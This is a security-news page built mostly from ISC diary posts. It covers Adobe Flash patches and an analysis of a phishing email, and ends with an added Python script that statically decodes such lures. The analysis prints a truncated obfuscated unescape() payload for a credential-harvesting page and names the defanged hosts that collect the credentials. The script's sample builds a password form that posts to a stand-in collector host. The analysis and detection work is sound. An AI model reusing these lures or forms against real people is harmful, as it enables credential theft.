Information Security News |
Anonymous' Op Icarus: Cyberattacks on Banks Around the World SYS-CON Media (press release) As part of its mission to share and analyze information security news, Peerlyst (https://www.peerlyst.com) has published a blog that discusses the recent wave of distributed denial of service (DDoS) attacks that Anonymous has used to take out central ... |
SANS Announces Agenda for Annual DFIR Summit in Austin, Texas SYS-CON Media (press release) BETHESDA, Md., May 12, 2016 /PRNewswire-USNewswire/ -- SANS Institute, the global leader in information security training, today announced the agenda for its annual Digital Forensics & Incident Response (DFIR) Summit and Training to be held June 23 ... |
As expected, Adobe released today updated versions of:
They are related to CVE-2016-4117. Windows, OSX, Linux and ChromeOS are affected but the patch is currently only available for Windows. Patch as soon as possible because the vulnerability is actively exploited in the wild.
Details: https://helpx.adobe.com/security/products/flash-player/apsa16-02.html
They also released new updated versions of:
Details: https://helpx.adobe.com/security/products/acrobat/apsb16-14.html
Finally, ColdFusion also got a patch: https://helpx.adobe.com/security/products/coldfusion/apsb16-16.html
Xavier Mertens
ISC Handler - Freelance Security Consultant
PGP Key
The Register | Lie back and think of cybersecurity: IBM lets students loose on Watson The Register That's because the infosec (sorry cyber security) biz is guilty of re-appropriating military terms such as APT en masse. IBM said collaborating with eight universities that have “some of the world's best cybersecurity programs” will help “further train ... |
I'm collecting a lot of phishing samples every day and most of them are part of big waves of spam... Millions of messages are sent with the hope that at least some victims will fall into the trap. And sometimes, you find a nice (different) one like yesterday. It was a classic email with the subject "Important Notice".
document.write(unescape(%3c%21%64%6f%63%74%79%70%65%20%68%74%6d%6c%3e%0d%0a%3c%68%74%6d%6c%3e%0d%0a%3c%68%65%61%64%3e%0d%0a%3c%6d%65%74%61%20%63%68%61%72%73%65%74%3d%22%75%74%66%2d%38%22%3e%0d%0a%3c%74%69%74%6c%65%3e%45%78%63%65%6c%20%4f%6e%6c%69%6e%65%3c%2f%74%69%74%6c%65%3e%0d%0a%3c%6d%65%74%61%20%6e%61%6d%65%3d%22%67%65%6e%65%72%61%74%6f%72%22%20%63%6f%6e%74%65%6e%74%3d%22%57%59%53%49%57%59%47%20%... (very long payload) ...4%3d%22%22%3e%3c%2f%64%69%76%3e%0d%0a%3c%2f%62%6f%64%79%3e%0d%0a%3c%2f%68%74%6d%6c%3e
It is not complicated to de-obfuscate this payload (the code is available here). The attacker generated a page with an online HTML editor and added a form to capture credentials. The rendered page looks like this: [screenshot]
The HTML objects are downloaded from hxxp://tourkrabithailand.com/images/services/gr/ and credentials are posted to hxxp://mat-update.be/money/result.php. I contacted the Belgian CERT yesterday to report this website and the domain is already blocked.
Nothing fancy, bad design (why a blue Download button?) but it works! The JavaScript code runs below the radar with a low VT detection rate: 2/56 (link).
Xavier Mertens
ISC Handler - Freelance Security Consultant
PGP Key
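The static de-obfuscation step described in the diary above, as an added example that is not the author's script (the diary only links to that): it decodes a document.write(unescape(...)) blob without running any JavaScript and reports the form target, password fields and remote resources. The sample payload and the example.test / example.invalid hosts are constructed placeholders, and the function names are hypothetical.

```python
import re
from html.parser import HTMLParser
from urllib.parse import unquote

# Constructed sample: a small page percent-encoded the same way as the payload
# quoted in the diary. Hosts are placeholders, not the ones from the diary.
_PAGE = ('<!doctype html>\r\n<html><head><title>Excel Online</title></head><body>'
         '<img src="http://static.example.test/img/logo.png">'
         '<form method="post" action="http://collector.example.invalid/result.php">'
         '<input name="email"><input type="password" name="pass"></form></body></html>')
SAMPLE = 'document.write(unescape("' + "".join("%%%02x" % b for b in _PAGE.encode()) + '"));'

# Argument of unescape(): %XX escapes plus the characters JS escape() leaves as-is.
# %uXXXX escapes are not handled in this sketch.
UNESCAPE_RE = re.compile(r"unescape\(\s*['\"]?((?:%[0-9a-fA-F]{2}|[\w.~*@/+-])+)", re.I)

class FormFinder(HTMLParser):
    """Collects form targets, password inputs and remotely loaded objects."""
    def __init__(self):
        super().__init__()
        self.actions, self.resources, self.password_fields = [], [], 0

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        if tag == "form" and a.get("action"):
            self.actions.append(a["action"])
        elif tag == "input" and (a.get("type") or "").lower() == "password":
            self.password_fields += 1
        elif tag in ("img", "script", "link") and (a.get("src") or a.get("href")):
            self.resources.append(a.get("src") or a.get("href"))

def defang(url):
    """Rewrite http(s) as hxxp(s) so the indicator is not clickable in reports."""
    return re.sub(r"^http", "hxxp", url, flags=re.I)

def analyze(js):
    """Statically decode unescape() blobs; nothing is executed or fetched."""
    report = {"actions": [], "resources": [], "password_fields": 0}
    for m in UNESCAPE_RE.finditer(js):
        # JS unescape() maps each %XX to one Latin-1 code point.
        html = unquote(m.group(1), encoding="latin-1")
        finder = FormFinder()
        finder.feed(html)
        report["actions"] += [defang(u) for u in finder.actions]
        report["resources"] += [defang(u) for u in finder.resources]
        report["password_fields"] += finder.password_fields
    return report

if __name__ == "__main__":
    print(analyze(SAMPLE))
```

A decoded page that contains a password field and a form action on a different host than its images is a quick triage signal for credential-harvesting attachments.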